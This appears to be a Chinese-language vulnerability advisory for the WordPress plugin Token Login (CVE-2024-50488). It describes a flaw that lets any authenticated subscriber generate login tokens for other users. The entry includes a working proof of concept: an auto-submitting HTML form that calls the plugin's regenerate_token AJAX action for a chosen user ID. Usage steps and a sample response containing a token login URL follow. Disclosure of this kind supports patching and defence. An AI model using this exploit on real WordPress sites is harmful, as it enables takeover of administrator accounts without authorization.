Token Login <= 1.0.3 - 已认证(订阅者+)权限提升
使用安全令牌化 URL 的自动登录插件,并具备按角色限制登录的功能。该 WordPress 插件在所有版本(包括 1.0.3)中存在因账户接管导致的权限提升漏洞。原因在于插件未正确验证用户是否具有为其他用户生成登录令牌的权限。这使得经过认证的攻击者(具有订阅者级别及以上访问权限)能够以其他用户(包括管理员)的身份登录。
发布时间:2024-10-25 00:00:00
CVE:CVE-2024-50488
CVSS:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 分数:8.8
标识:token-login
登录后运行此 HTML 表单提交。 将 URL 更改为你已登录的 WordPress 站点。 将 ID 更改为你想为其生成令牌的用户。 复制该 URL,即可作为该用户登录。
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tl_admin_ajax_action" />
<input type="hidden" name="method" value="regenerate_token" />
<input type="hidden" name="user_id" value="7" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
响应
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}